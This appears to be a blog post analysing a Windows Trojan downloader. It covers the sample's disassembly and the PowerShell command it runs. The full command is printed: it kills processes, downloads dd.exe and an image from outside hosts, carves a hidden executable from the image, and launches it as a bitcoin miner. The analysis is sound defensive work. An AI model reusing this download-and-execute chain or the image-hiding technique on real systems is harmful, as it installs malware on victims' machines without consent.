Analysis: Trojan.Downloader.9da0a9fb4f6a044b83ebf829dc1950eccc07c077a3a32f1378f5f6f19f28192c

A look over of a Trojan.Downloader I came across on VirusTotal intelligence. Turned out to be a file hiding more secrets than a wife hiding an affair!

There is a single function in the binary, main(), which has been compiled using MinGW: signature,MingWin32 v?.? (h) . The segments are pretty standard which makes me think the binary hasn’t been packed: name,.text,.data,.rdata,.bss,.idata according to PEStudio

The function of interest (main) looks as follows:

.text:00401290 ; =============== S U B R O U T I N E =======================================
.text:00401290
.text:00401290 ; Attributes: bp-based frame
.text:00401290
.text:00401290 ; int __cdecl main(int argc, const char **argv, const char **envp)
.text:00401290                 public _main
.text:00401290 _main           proc near               ; CODE XREF: ___mingw_CRTStartup+E2p
.text:00401290
.text:00401290 Command         = dword ptr -8
.text:00401290 var_4           = dword ptr -4
.text:00401290 argc            = dword ptr  8
.text:00401290 argv            = dword ptr  0Ch
.text:00401290 envp            = dword ptr  10h
.text:00401290
.text:00401290                 push    ebp
.text:00401291                 mov     ebp, esp
.text:00401293                 sub     esp, 8
.text:00401296                 and     esp, 0FFFFFFF0h
.text:00401299                 mov     eax, 0
.text:0040129E                 add     eax, 0Fh
.text:004012A1                 add     eax, 0Fh
.text:004012A4                 shr     eax, 4
.text:004012A7                 shl     eax, 4
.text:004012AA                 mov     [ebp+var_4], eax
.text:004012AD                 mov     eax, [ebp+var_4]
.text:004012B0                 call    __alloca
.text:004012B5                 call    ___main
.text:004012BA                 mov     [esp+8+Command], offset Command ; "powershell \"Stop-Process -NAME mscl -F"...
.text:004012C1                 call    _system
.text:004012C6                 mov     eax, 0
.text:004012CB                 leave
.text:004012CC                 retn
.text:004012CC _main           endp
.text:004012CC
.text:004012CC ; ---------------------------------------------------------------------------

Looking through the above disassembled code there are 2 things to notice.
1. .text:004012BA mov [esp+8+Command], offset Command ; "powershell \"Stop-Process -NAME mscl -F"...
2. .text:004012C1 call _system

Command is the command which will be executed via the system command (http://www.cplusplus.com/reference/cstdlib/system/)

The command which is executed is as follows:

powershell \"Stop-Process -NAME mscl -Force -ErrorAction SilentlyContinue;Stop-Process -NAME msupdate -Force -ErrorAction SilentlyContinue;Stop-Process -NAME yam -Force -ErrorAction SilentlyContinue;Stop-Process -NAME moduleinstaller -Force -ErrorAction SilentlyContinue;Stop-Process -NAME mscorsvw -Force -ErrorAction SilentlyContinue;(New-Object System.Net.WebClient).DownloadFile('https://cdn.rawgit.com/ubunvwxs/ddforwindows/c5675e0b/dd.exe','dd.exe');(New-Object System.Net.WebClient).DownloadFile('http://img1.imagehousing.com/0/art-672903.jpg','favicon.jpg');(New-Object -com Shell.Application).ShellExecute('dd.exe','if=favicon.jpg of=svchost.exe skip=2931 bs=1');Start-Sleep -s 10;(New-Object -com Shell.Application).ShellExecute('svchost.exe');\"

So a PowerShell session is loaded and a bunch of commands are executed, which are as follows:

Stop-Process -NAME mscl -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME msupdate -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME yam -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME moduleinstaller -Force -ErrorAction SilentlyContinue;
Stop-Process -NAME mscorsvw -Force -ErrorAction SilentlyContinue;
(New-Object System.Net.WebClient).DownloadFile('https://cdn.rawgit.com/ubunvwxs/ddforwindows/c5675e0b/dd.exe','dd.exe');
(New-Object System.Net.WebClient).DownloadFile('http://img1.imagehousing.com/0/art-672903.jpg','favicon.jpg');
(New-Object -com Shell.Application).ShellExecute('dd.exe','if=favicon.jpg of=svchost.exe skip=2931 bs=1');
Start-Sleep -s 10;
(New-Object -com Shell.Application).ShellExecute('svchost.exe');

The script won’t actually run, due to HTTPS issues; but what if… Let’s keep exploring.
The script downloads dd, which is a Unix utility used to convert and copy files. It also downloads an image, saves it as favicon.jpg then converts it to a binary…

That is pretty… odd… It means there is some stenography going on behind the scenes in that image.

$ dd.exe if=favicon.jpg of=svchost.exe skip=2931 bs=1
rawwrite dd for windows version 0.6beta3.
Written by John Newbigin <[email protected]>
This program is covered by terms of the GPL Version 2.

skip to 2931
343040+0 records in
343040+0 records out

Things get pretty interesting here. svchost.exe is a valid binary. It was embedded within the image, in a way that didn’t invalidate the image – thus allowing it to be hosted on imagehousing.com! Pretty cool if you ask me!

In any event svchost is a 64bit bitcoin miner 🙂

References

VirusTotal
original binary - https://www.virustotal.com/en/file/9da0a9fb4f6a044b83ebf829dc1950eccc07c077a3a32f1378f5f6f19f28192c/analysis/
favicon.jpg - https://www.virustotal.com/file/43deab7498966d3d955fa23fbfd9cc2d5c363417c8eddd4b8db8e3e0fdeeb28f/analysis/
svchost.exe - https://www.virustotal.com/file/0ab9eed74a03bce3b40e02c77f74718c7110ceadd946484da9227c2f2a76cdbe/analysis/

Tools
PEStudio - https://www.winitor.com/
Hex-Rays IDA

 

Leave a Reply

Your email address will not be published. Required fields are marked *